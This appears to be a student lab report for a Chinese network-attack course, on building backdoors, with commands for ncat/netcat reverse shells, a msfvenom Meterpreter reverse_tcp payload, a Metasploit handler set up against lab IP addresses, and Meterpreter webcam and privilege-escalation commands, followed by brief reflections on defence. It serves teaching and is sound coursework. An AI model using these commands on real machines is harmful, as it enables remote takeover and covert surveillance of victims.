2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践一、实践目标
二、基础知识
三、Exp2.1 使用ncat,本机(Windows)获得虚拟机(Linux)操作shell实验步骤:
ncat.exe -l -p 5237
nc 192.168.153.134 -e /bin/sh 反弹连接Windows主机的 5237 端口
ncat.exe -e cmd.exe 192.168.153.134 5237 反弹连接Linux的5237端口
四、Exp2.2使用netcat获取主机操作Shell,cron启动实验原理
五、Exp2.3使用socat获取主机操作Shell,任务计划启动实验步骤
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.134 LPORT=5237 -f exe > 20165237.exe
use exploit/multi/handler /*进入handler模式*/ set payload windows/meterpreter/reverse_tcp /*对应生成的后门程序设置payload*/ show options /*查看当前信息状态*/ set LHOST 192.168.153.134 /*设置LHOST,其中ip为Linux的ip*/ set LPORT 5237 /*设置LPORT*/ exploit /*启动监听*/
七、Exp2.5使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权实验步骤
webcam_snap / webcam_stream
getuid get system 八、实验感想与问题
答:
答:在下载软件的时候,可能会有捆绑垃圾下载下来,然后修改开机的启动项,当攻击者输入命令时,本机可能会自动响应。
答:我觉得最深刻的就是录像和音频的获取(这不就是黑客监视么!!)我已经将笔记本的摄像头贴起来了。
答:360安全卫士或许是个很好的选择;不过如果真正想要发现后门程序,我觉得要用抓包技术来分析信息。 (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
- windows – Delphi2010中的CoInternetIsFeatureEnabled
- windows 常用命令
- New-Object上的Windows RT Powershell(PermissionDenied)
- Windows下搭建以太坊私有链环境1.8.2
- [图形学]VS2017中OpenGL的下载及安装中的异常
- windows – 主分区和扩展分区
- 我应该学习如何使用Windows API与Python?
- windows-server-2008 – 密码验证失败 – NTLMv2
- Windows VPN客户端连接在不同的端口上
- windows – 用于删除超过X天的文件的批处理脚本(基于创建日